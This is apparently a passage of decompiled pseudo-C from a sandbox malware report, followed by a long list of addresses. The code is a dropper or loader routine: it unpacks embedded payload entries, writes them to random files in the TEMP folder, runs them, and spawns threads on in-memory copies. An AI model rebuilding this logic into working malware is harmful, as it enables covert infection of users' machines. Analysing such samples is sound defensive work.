                                                                                                                                                                                                                                                    								if(( *(_t508 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                    									goto L22;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								__eflags =  *0xed435d & 0x000000ff;
                                                                                                                                                                                                                                                    								if(( *0xed435d & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    									goto L22;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t509 = _v20;
                                                                                                                                                                                                                                                    								__eflags =  *(_t509 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                    								if(( *(_t509 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                    									_t433 = E00EC1EE0(_v28, 0xea60);
                                                                                                                                                                                                                                                    									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                    									_v8 = _t433 & 0x000000ff;
                                                                                                                                                                                                                                                    									L21:
                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v44 =  *((intOrPtr*)(_v28 + _v32 - 4));
                                                                                                                                                                                                                                                    								_v40 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                    								__eflags = _v40;
                                                                                                                                                                                                                                                    								if(_v40 == 0) {
                                                                                                                                                                                                                                                    									L19:
                                                                                                                                                                                                                                                    									goto L21;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t439 = E00EC6260(_v40, _v28, _v32, _v40, _v44);
                                                                                                                                                                                                                                                    								__eflags = _t439 - _v44;
                                                                                                                                                                                                                                                    								if(_t439 == _v44) {
                                                                                                                                                                                                                                                    									_t442 = E00EC1EE0(_v40, 0xea60);
                                                                                                                                                                                                                                                    									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                    									_v8 = _t442 & 0x000000ff;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								VirtualFree(_v40, 0, 0x8000);
                                                                                                                                                                                                                                                    								goto L19;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v36 =  *_v20;
                                                                                                                                                                                                                                                    								_v20 = _v20 + _v36;
                                                                                                                                                                                                                                                    								if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                    									goto L10;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									return 0;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v13 = 0;
                                                                                                                                                                                                                                                    						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                    						_v48 = 0;
                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                    							__eflags = _v48 - _v12;
                                                                                                                                                                                                                                                    							if(_v48 >= _v12) {
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__eflags = _v48;
                                                                                                                                                                                                                                                    							if(_v48 <= 0) {
                                                                                                                                                                                                                                                    								L29:
                                                                                                                                                                                                                                                    								_v52 = _v20 + 0x18;
                                                                                                                                                                                                                                                    								_v56 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0xece274; // 0x2
                                                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                                                    									L39:
                                                                                                                                                                                                                                                    									_t448 = _v20;
                                                                                                                                                                                                                                                    									__eflags =  *(_t448 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                    									if(( *(_t448 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                    										__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0xece270; // 0x1
                                                                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                                                                    											L90:
                                                                                                                                                                                                                                                    											__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0xece278; // 0x3
                                                                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                                                                    												L93:
                                                                                                                                                                                                                                                    												__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0xece27c; // 0x4
                                                                                                                                                                                                                                                    												if(__eflags == 0) {
                                                                                                                                                                                                                                                    													_v13 = 1;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												L95:
                                                                                                                                                                                                                                                    												L24:
                                                                                                                                                                                                                                                    												_t452 = _v48 + 1;
                                                                                                                                                                                                                                                    												__eflags = _t452;
                                                                                                                                                                                                                                                    												_v48 = _t452;
                                                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0xece288; // 0x2
                                                                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                                                                    												goto L93;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_t317 =  *0xece28c; // 0xed3f88
                                                                                                                                                                                                                                                    											_t455 =  *0xed18a0; // 0xed3b88
                                                                                                                                                                                                                                                    											E00ECA360(_t455, _t317, _v52, _v56);
                                                                                                                                                                                                                                                    											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                    											goto L95;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0xece284; // 0x1
                                                                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                                                                    											goto L90;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										_t321 = E00EC7250(_v20, _v52, _v56);
                                                                                                                                                                                                                                                    										_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                    										__eflags = _t321 & 0x000000ff;
                                                                                                                                                                                                                                                    										if((_t321 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    											_t528 = _v20;
                                                                                                                                                                                                                                                    											__eflags =  *(_t528 + 0x14);
                                                                                                                                                                                                                                                    											if( *(_t528 + 0x14) == 0) {
                                                                                                                                                                                                                                                    												L48:
                                                                                                                                                                                                                                                    												_t529 = _v20;
                                                                                                                                                                                                                                                    												__eflags =  *(_t529 + 0xc) & 0x00000001;
                                                                                                                                                                                                                                                    												if(( *(_t529 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                    													GetEnvironmentVariableA("TEMP",  &_v1196, 0x104);
                                                                                                                                                                                                                                                    													E00EC7D20( &_v932,  &_v932, 0, 0xa);
                                                                                                                                                                                                                                                    													E00EC9730( &_v932, 4);
                                                                                                                                                                                                                                                    													_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                    													GetTempFileNameA( &_v1196,  &_v932, GetTickCount() % 0xffff,  &_v916);
                                                                                                                                                                                                                                                    													_v920 = CreateFileA( &_v916, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                    													__eflags = _v920 - 0xffffffff;
                                                                                                                                                                                                                                                    													if(_v920 == 0xffffffff) {
                                                                                                                                                                                                                                                    														L89:
                                                                                                                                                                                                                                                    														goto L24;
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    													_v1200 = 0;
                                                                                                                                                                                                                                                    													_v1204 = 0;
                                                                                                                                                                                                                                                    													_v1208 = _v56;
                                                                                                                                                                                                                                                    													_t333 = _v20;
                                                                                                                                                                                                                                                    													__eflags =  *(_t333 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                    													if(( *(_t333 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                    														_v1204 = WriteFile(_v920, _v52, _v56,  &_v1200, 0);
                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                    														_v1216 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                    														_v1212 = VirtualAlloc(0, _v1216, 0x3000, 4);
                                                                                                                                                                                                                                                    														__eflags = _v1212;
                                                                                                                                                                                                                                                    														if(_v1212 != 0) {
                                                                                                                                                                                                                                                    															_t349 = E00EC6260(_v56, _v52, _v56, _v1212, _v1216);
                                                                                                                                                                                                                                                    															__eflags = _t349 - _v1216;
                                                                                                                                                                                                                                                    															if(_t349 == _v1216) {
                                                                                                                                                                                                                                                    																_v1204 = WriteFile(_v920, _v1212, _v1216,  &_v1200, 0);
                                                                                                                                                                                                                                                    																_v1208 = _v1216;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															VirtualFree(_v1212, 0, 0x8000);
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    													__eflags = _v1204;
                                                                                                                                                                                                                                                    													if(_v1204 == 0) {
                                                                                                                                                                                                                                                    														L88:
                                                                                                                                                                                                                                                    														CloseHandle(_v920);
                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                    														__eflags = _v1200 - _v1208;
                                                                                                                                                                                                                                                    														if(_v1200 != _v1208) {
                                                                                                                                                                                                                                                    															goto L88;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														CloseHandle(_v920);
                                                                                                                                                                                                                                                    														_t340 = E00EC1E60( &_v916);
                                                                                                                                                                                                                                                    														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                    														_v1220 = _t340;
                                                                                                                                                                                                                                                    														__eflags = _v1220;
                                                                                                                                                                                                                                                    														if(_v1220 != 0) {
                                                                                                                                                                                                                                                    															_t465 = _v20;
                                                                                                                                                                                                                                                    															__eflags =  *(_t465 + 0x10);
                                                                                                                                                                                                                                                    															if( *(_t465 + 0x10) != 0) {
                                                                                                                                                                                                                                                    																E00EC73C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                    																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															_t539 = _v20;
                                                                                                                                                                                                                                                    															__eflags =  *(_t539 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                    															if(( *(_t539 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                    																E00EC2510(_v1220, 0xece290);
                                                                                                                                                                                                                                                    																_t598 = _t598 + 8;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															_v8 = 1;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    													goto L89;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												_v636 = 0;
                                                                                                                                                                                                                                                    												_v632 = 0;
                                                                                                                                                                                                                                                    												_v640 = 0;
                                                                                                                                                                                                                                                    												_t472 = _v20;
                                                                                                                                                                                                                                                    												__eflags =  *(_t472 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                    												if(( *(_t472 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                    													_t355 = E00EC2070(_v52);
                                                                                                                                                                                                                                                    													_t598 = _t598 + 4;
                                                                                                                                                                                                                                                    													_v636 = _t355;
                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                    													_v640 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                    													_t378 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    													_v644 = _t378;
                                                                                                                                                                                                                                                    													__eflags = _v644;
                                                                                                                                                                                                                                                    													if(_v644 != 0) {
                                                                                                                                                                                                                                                    														_t381 = E00EC6260(_v644, _v52, _v56, _v644, _v640);
                                                                                                                                                                                                                                                    														__eflags = _t381 - _v640;
                                                                                                                                                                                                                                                    														if(_t381 == _v640) {
                                                                                                                                                                                                                                                    															_t383 = E00EC2070(_v644); // executed
                                                                                                                                                                                                                                                    															_t598 = _t598 + 4;
                                                                                                                                                                                                                                                    															_v636 = _t383;
                                                                                                                                                                                                                                                    															_t563 = _v20;
                                                                                                                                                                                                                                                    															__eflags =  *(_t563 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                    															if(( *(_t563 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                    																_t386 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    																_v632 = _t386;
                                                                                                                                                                                                                                                    																E00EC7B70(_v632, _v644, _v640);
                                                                                                                                                                                                                                                    																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														VirtualFree(_v644, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												__eflags = _v636;
                                                                                                                                                                                                                                                    												if(_v636 != 0) {
                                                                                                                                                                                                                                                    													_t473 = _v20;
                                                                                                                                                                                                                                                    													__eflags =  *(_t473 + 0x10);
                                                                                                                                                                                                                                                    													if( *(_t473 + 0x10) != 0) {
                                                                                                                                                                                                                                                    														E00EC73C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                    														_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    													_t549 = _v20;
                                                                                                                                                                                                                                                    													__eflags =  *(_t549 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                    													if(( *(_t549 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                    														_t361 = E00EC97A0(0x10);
                                                                                                                                                                                                                                                    														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                    														_v1228 = _t361;
                                                                                                                                                                                                                                                    														_v648 = _v1228;
                                                                                                                                                                                                                                                    														_t551 = _v20;
                                                                                                                                                                                                                                                    														__eflags =  *(_t551 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                    														if(( *(_t551 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                    															 *_v648 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                    															__eflags =  *_v648;
                                                                                                                                                                                                                                                    															if( *_v648 != 0) {
                                                                                                                                                                                                                                                    																E00EC7B70( *_v648, _v52, _v56);
                                                                                                                                                                                                                                                    																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                    																 *(_v648 + 4) = _v56;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                                    															 *_v648 = _v632;
                                                                                                                                                                                                                                                    															 *(_v648 + 4) = _v640;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														__eflags =  *_v648;
                                                                                                                                                                                                                                                    														if( *_v648 != 0) {
                                                                                                                                                                                                                                                    															 *((intOrPtr*)(_v648 + 8)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                    															 *((intOrPtr*)(_v648 + 0xc)) = _v636;
                                                                                                                                                                                                                                                    															_t368 = CreateThread(0, 0, E00EC77B0, _v648, 0, 0); // executed
                                                                                                                                                                                                                                                    															_v652 = _t368;
                                                                                                                                                                                                                                                    															CloseHandle(_v652);
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    													_t550 = _v20;
                                                                                                                                                                                                                                                    													__eflags =  *(_t550 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                    													if(( *(_t550 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                    														E00EC2510(_v636, 0xece290);
                                                                                                                                                                                                                                                    														_t598 = _t598 + 8;
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    													_v8 = 1;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												goto L24;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_v620 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                    											__eflags = _v620;
                                                                                                                                                                                                                                                    											if(_v620 == 0) {
                                                                                                                                                                                                                                                    												goto L48;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											E00EC7B70(_v620, _v52, _v56);
                                                                                                                                                                                                                                                    											_t393 = E00EC97A0(0x20);
                                                                                                                                                                                                                                                    											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                    											_v1224 = _t393;
                                                                                                                                                                                                                                                    											_v624 = _v1224;
                                                                                                                                                                                                                                                    											 *_v624 =  *_v20;
                                                                                                                                                                                                                                                    											 *((intOrPtr*)(_v624 + 4)) =  *((intOrPtr*)(_v20 + 4));
                                                                                                                                                                                                                                                    											 *((intOrPtr*)(_v624 + 8)) =  *((intOrPtr*)(_v20 + 8));
                                                                                                                                                                                                                                                    											 *((intOrPtr*)(_v624 + 0x14)) =  *((intOrPtr*)(_v20 + 0x14));
                                                                                                                                                                                                                                                    											 *((intOrPtr*)(_v624 + 0x1c)) = _v56;
                                                                                                                                                                                                                                                    											 *((intOrPtr*)(_v624 + 0xc)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                    											 *((intOrPtr*)(_v624 + 0x10)) =  *((intOrPtr*)(_v20 + 0x10));
                                                                                                                                                                                                                                                    											 *(_v624 + 0x18) = _v620;
                                                                                                                                                                                                                                                    											_v628 = CreateThread(0, 0, E00EC6DA0, _v624, 0, 0);
                                                                                                                                                                                                                                                    											CloseHandle(_v628);
                                                                                                                                                                                                                                                    											goto L24;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										goto L24;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									goto L24;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0xece284; // 0x1
                                                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                                                    									goto L39;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                    								E00EC7D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                    								E00EC9730( &_v340, 4);
                                                                                                                                                                                                                                                    								_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                    								GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                    								_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                    								__eflags = _v328 - 0xffffffff;
                                                                                                                                                                                                                                                    								if(_v328 == 0xffffffff) {
                                                                                                                                                                                                                                                    									goto L39;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v608 = 0;
                                                                                                                                                                                                                                                    								_v612 = 0;
                                                                                                                                                                                                                                                    								_t415 = WriteFile(_v328, _v52, _v56,  &_v612, 0);
                                                                                                                                                                                                                                                    								__eflags = _t415;
                                                                                                                                                                                                                                                    								if(_t415 == 0) {
                                                                                                                                                                                                                                                    									L37:
                                                                                                                                                                                                                                                    									__eflags = _v608;
                                                                                                                                                                                                                                                    									if(_v608 == 0) {
                                                                                                                                                                                                                                                    										CloseHandle(_v328);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									goto L39;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								__eflags = _v612 - _v56;
                                                                                                                                                                                                                                                    								if(_v612 != _v56) {
                                                                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v608 = CloseHandle(_v328);
                                                                                                                                                                                                                                                    								E00EC6C60();
                                                                                                                                                                                                                                                    								_t421 = E00EC1E60( &_v324);
                                                                                                                                                                                                                                                    								_t598 = _t598 + 4;
                                                                                                                                                                                                                                                    								_v616 = _t421;
                                                                                                                                                                                                                                                    								__eflags = _v616;
                                                                                                                                                                                                                                                    								if(_v616 == 0) {
                                                                                                                                                                                                                                                    									E00EC6CF0();
                                                                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								E00EC74A0();
                                                                                                                                                                                                                                                    								ExitProcess(0);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v60 =  *_v20;
                                                                                                                                                                                                                                                    							_v20 = _v20 + _v60;
                                                                                                                                                                                                                                                    							__eflags = _v20 - _a4 + _a8;
                                                                                                                                                                                                                                                    							if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                    								goto L29;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							return 0;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						__eflags = (_v13 & 0x000000ff) - 1;
                                                                                                                                                                                                                                                    						if((_v13 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                    							 *0xed30e4 = 1;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							 *0xed30e4 = 2;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L99;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}
















































































                                                                                                                                                                                                                                                    0x00ec62b9
                                                                                                                                                                                                                                                    0x00ec62c4
                                                                                                                                                                                                                                                    0x00ec6c4e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec62d4
                                                                                                                                                                                                                                                    0x00ec62d9
                                                                                                                                                                                                                                                    0x00ec62e0
                                                                                                                                                                                                                                                    0x00ec62f9
                                                                                                                                                                                                                                                    0x00ec62fc
                                                                                                                                                                                                                                                    0x00ec630e
                                                                                                                                                                                                                                                    0x00ec631e
                                                                                                                                                                                                                                                    0x00ec6343
                                                                                                                                                                                                                                                    0x00ec6349
                                                                                                                                                                                                                                                    0x00ec6354
                                                                                                                                                                                                                                                    0x00ec635d
                                                                                                                                                                                                                                                    0x00ec6363
                                                                                                                                                                                                                                                    0x00ec6429
                                                                                                                                                                                                                                                    0x00ec6308
                                                                                                                                                                                                                                                    0x00ec6308
                                                                                                                                                                                                                                                    0x00ec630b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec630b
                                                                                                                                                                                                                                                    0x00ec636f
                                                                                                                                                                                                                                                    0x00ec6375
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec637b
                                                                                                                                                                                                                                                    0x00ec6381
                                                                                                                                                                                                                                                    0x00ec6384
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6391
                                                                                                                                                                                                                                                    0x00ec6393
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6399
                                                                                                                                                                                                                                                    0x00ec639f
                                                                                                                                                                                                                                                    0x00ec63a2
                                                                                                                                                                                                                                                    0x00ec6419
                                                                                                                                                                                                                                                    0x00ec641e
                                                                                                                                                                                                                                                    0x00ec6424
                                                                                                                                                                                                                                                    0x00ec6427
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6427
                                                                                                                                                                                                                                                    0x00ec63ad
                                                                                                                                                                                                                                                    0x00ec63c3
                                                                                                                                                                                                                                                    0x00ec63c6
                                                                                                                                                                                                                                                    0x00ec63ca
                                                                                                                                                                                                                                                    0x00ec640e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec640e
                                                                                                                                                                                                                                                    0x00ec63dc
                                                                                                                                                                                                                                                    0x00ec63e1
                                                                                                                                                                                                                                                    0x00ec63e4
                                                                                                                                                                                                                                                    0x00ec63ef
                                                                                                                                                                                                                                                    0x00ec63f4
                                                                                                                                                                                                                                                    0x00ec63fa
                                                                                                                                                                                                                                                    0x00ec63fa
                                                                                                                                                                                                                                                    0x00ec6408
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6320
                                                                                                                                                                                                                                                    0x00ec6325
                                                                                                                                                                                                                                                    0x00ec632e
                                                                                                                                                                                                                                                    0x00ec633a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec633c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec633c
                                                                                                                                                                                                                                                    0x00ec633a
                                                                                                                                                                                                                                                    0x00ec631e
                                                                                                                                                                                                                                                    0x00ec642e
                                                                                                                                                                                                                                                    0x00ec6438
                                                                                                                                                                                                                                                    0x00ec643b
                                                                                                                                                                                                                                                    0x00ec644d
                                                                                                                                                                                                                                                    0x00ec6450
                                                                                                                                                                                                                                                    0x00ec6453
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6459
                                                                                                                                                                                                                                                    0x00ec645d
                                                                                                                                                                                                                                                    0x00ec6482
                                                                                                                                                                                                                                                    0x00ec6488
                                                                                                                                                                                                                                                    0x00ec6493
                                                                                                                                                                                                                                                    0x00ec649c
                                                                                                                                                                                                                                                    0x00ec64a2
                                                                                                                                                                                                                                                    0x00ec65f3
                                                                                                                                                                                                                                                    0x00ec65f3
                                                                                                                                                                                                                                                    0x00ec65f9
                                                                                                                                                                                                                                                    0x00ec65fc
                                                                                                                                                                                                                                                    0x00ec6609
                                                                                                                                                                                                                                                    0x00ec660f
                                                                                                                                                                                                                                                    0x00ec6bdd
                                                                                                                                                                                                                                                    0x00ec6be3
                                                                                                                                                                                                                                                    0x00ec6be9
                                                                                                                                                                                                                                                    0x00ec6c18
                                                                                                                                                                                                                                                    0x00ec6c1e
                                                                                                                                                                                                                                                    0x00ec6c24
                                                                                                                                                                                                                                                    0x00ec6c26
                                                                                                                                                                                                                                                    0x00ec6c26
                                                                                                                                                                                                                                                    0x00ec6c2a
                                                                                                                                                                                                                                                    0x00ec6444
                                                                                                                                                                                                                                                    0x00ec6447
                                                                                                                                                                                                                                                    0x00ec6447
                                                                                                                                                                                                                                                    0x00ec644a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec644a
                                                                                                                                                                                                                                                    0x00ec6bf1
                                                                                                                                                                                                                                                    0x00ec6bf7
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6c01
                                                                                                                                                                                                                                                    0x00ec6c07
                                                                                                                                                                                                                                                    0x00ec6c0e
                                                                                                                                                                                                                                                    0x00ec6c13
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6c13
                                                                                                                                                                                                                                                    0x00ec661b
                                                                                                                                                                                                                                                    0x00ec6621
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6633
                                                                                                                                                                                                                                                    0x00ec6638
                                                                                                                                                                                                                                                    0x00ec663e
                                                                                                                                                                                                                                                    0x00ec6640
                                                                                                                                                                                                                                                    0x00ec6647
                                                                                                                                                                                                                                                    0x00ec664a
                                                                                                                                                                                                                                                    0x00ec664e
                                                                                                                                                                                                                                                    0x00ec6752
                                                                                                                                                                                                                                                    0x00ec6752
                                                                                                                                                                                                                                                    0x00ec6758
                                                                                                                                                                                                                                                    0x00ec675b
                                                                                                                                                                                                                                                    0x00ec69cb
                                                                                                                                                                                                                                                    0x00ec69dc
                                                                                                                                                                                                                                                    0x00ec69ed
                                                                                                                                                                                                                                                    0x00ec69f2
                                                                                                                                                                                                                                                    0x00ec6a1a
                                                                                                                                                                                                                                                    0x00ec6a3c
                                                                                                                                                                                                                                                    0x00ec6a42
                                                                                                                                                                                                                                                    0x00ec6a49
                                                                                                                                                                                                                                                    0x00ec6bd6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6bd6
                                                                                                                                                                                                                                                    0x00ec6a4f
                                                                                                                                                                                                                                                    0x00ec6a59
                                                                                                                                                                                                                                                    0x00ec6a66
                                                                                                                                                                                                                                                    0x00ec6a6c
                                                                                                                                                                                                                                                    0x00ec6a72
                                                                                                                                                                                                                                                    0x00ec6a75
                                                                                                                                                                                                                                                    0x00ec6b3c
                                                                                                                                                                                                                                                    0x00ec6a7b
                                                                                                                                                                                                                                                    0x00ec6a84
                                                                                                                                                                                                                                                    0x00ec6aa0
                                                                                                                                                                                                                                                    0x00ec6aa6
                                                                                                                                                                                                                                                    0x00ec6aad
                                                                                                                                                                                                                                                    0x00ec6ac5
                                                                                                                                                                                                                                                    0x00ec6aca
                                                                                                                                                                                                                                                    0x00ec6ad0
                                                                                                                                                                                                                                                    0x00ec6af6
                                                                                                                                                                                                                                                    0x00ec6b02
                                                                                                                                                                                                                                                    0x00ec6b02
                                                                                                                                                                                                                                                    0x00ec6b16
                                                                                                                                                                                                                                                    0x00ec6b16
                                                                                                                                                                                                                                                    0x00ec6b1c
                                                                                                                                                                                                                                                    0x00ec6b42
                                                                                                                                                                                                                                                    0x00ec6b49
                                                                                                                                                                                                                                                    0x00ec6bc9
                                                                                                                                                                                                                                                    0x00ec6bd0
                                                                                                                                                                                                                                                    0x00ec6b4b
                                                                                                                                                                                                                                                    0x00ec6b51
                                                                                                                                                                                                                                                    0x00ec6b57
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6b60
                                                                                                                                                                                                                                                    0x00ec6b6d
                                                                                                                                                                                                                                                    0x00ec6b72
                                                                                                                                                                                                                                                    0x00ec6b75
                                                                                                                                                                                                                                                    0x00ec6b7b
                                                                                                                                                                                                                                                    0x00ec6b82
                                                                                                                                                                                                                                                    0x00ec6b84
                                                                                                                                                                                                                                                    0x00ec6b87
                                                                                                                                                                                                                                                    0x00ec6b8b
